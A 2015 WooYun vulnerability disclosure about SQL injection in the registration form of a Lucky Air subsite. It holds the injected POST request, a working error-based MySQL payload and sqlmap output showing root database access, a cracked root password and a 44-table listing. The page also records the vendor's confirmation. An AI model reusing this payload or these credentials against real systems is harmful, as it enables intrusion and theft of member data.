当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155970

漏洞标题:祥鹏航空分站SQL注入/root权限/44个表信息/会员信息

相关厂商:祥鹏航空

漏洞作者: 路人甲

提交时间:2015-11-26 10:09

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

POST /register.aspx HTTP/1.1
Content-Length: 600
Content-Type: application/x-www-form-urlencoded
Referer: http://pyh.luckyair.net:80/
Cookie: ASP.NET_SessionId=riwoeb5h2jm13n4bnmy3vsvd
Host: pyh.luckyair.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24content%24btnRegister=%e6%b3%a8%20%20%e5%86%8c&ctl00%24content%24account=1'%22&ctl00%24content%24email=sample%40email.tst&ctl00%24content%24mobile=987-65-4329&ctl00%24content%24passconfirm=g00dPa%24%24w0rD&ctl00%24content%24password=g00dPa%24%24w0rD&ctl00%24content%24realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm%2bHvDwLQzvSmBAKFid%2byAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q%2b8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA%3d%3d&__VIEWSTATEGENERATOR=799CC77D


1.jpg


2.jpg


3.jpg


root 密码解出:1234


4.jpg


可sql-shell


5.jpg


6.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
current database:    'ticketdb'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ticketdb
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
select database():    'ticketdb'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] root [2]:
    password hash: *A4B6157319038724E3560894F7F932C8886EBFCF
    clear-text password: 1234
    password hash: NULL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
select database():    'ticketdb'
select user():    'root@localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$content$account (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: ctl00$content$btnRegister=%e6%b3%a8  %e5%86%8c&ctl00$content$account=-1686' OR 1 GROUP BY CONCAT(0x71766b6b71,(SELECT (CASE WHEN (9014=9014) THEN 1 ELSE 0 END)),0x71716a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ctl00$content$email=sample@email.tst&ctl00$content$mobile=987-65-4329&ctl00$content$passconfirm=g00dPa$$w0rD&ctl00$content$password=g00dPa$$w0rD&ctl00$content$realname=pfymlrkc&sex=%e4%bf%9d%e5%af%86&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALUgqOfAwKY3YqlDwLFz9rYBQKipdefBAKTm+HvDwLQzvSmBAKFid+yAgKtgIjVCICOw11H9JMfEZLmfTnv4nnwQhuyriupWXYN4BZymAOs&__VIEWSTATE=/wEPDwUJNjU3NjQ1NjU2ZGSDR/ySBSGyti3Q+8Hcpk9rwzDQuI/pRaGhj1I5Wev9TA==&__VIEWSTATEGENERATOR=799CC77D
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
Database: ticketdb
[44 tables]
+------------------------+
| info_adv               |
| npc_dict_group         |
| npc_dict_item          |
| npc_info_content_page  |
| npc_info_group         |
| npc_notice_info        |
| npc_notice_push_record |
| npc_sys_action_detail  |
| npc_sys_action_log     |
| npc_sys_admin_info     |
| npc_sys_authorization  |
| npc_sys_config         |
| npc_sys_exception_log  |
| npc_sys_link_user_org  |
| npc_sys_link_user_role |
| npc_sys_member_data    |
| npc_sys_member_info    |
| npc_sys_menu           |
| npc_sys_org_group      |
| npc_sys_org_info       |
| npc_sys_role_info      |
| npc_sys_user_data      |
| npc_sys_user_info      |
| shop_address           |
| shop_brand             |
| shop_cart              |
| shop_category          |
| shop_comment           |
| shop_commodity         |
| shop_commodity_detail  |
| shop_commodity_price   |
| shop_consultation      |
| shop_favorite          |
| shop_logs              |
| shop_order             |
| shop_order_flow        |
| shop_order_item        |
| shop_packages          |
| shop_pay_item          |
| shop_pay_list          |
| shop_paylist           |
| shop_sale              |
| shop_service_order     |
| shop_supplier_info     |
+------------------------+

漏洞证明:

修复方案:

过滤相关参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-11-26 10:29

厂商回复:

够专注、够用心。 已组织相关人员修复该漏洞。

最新状态:

暂无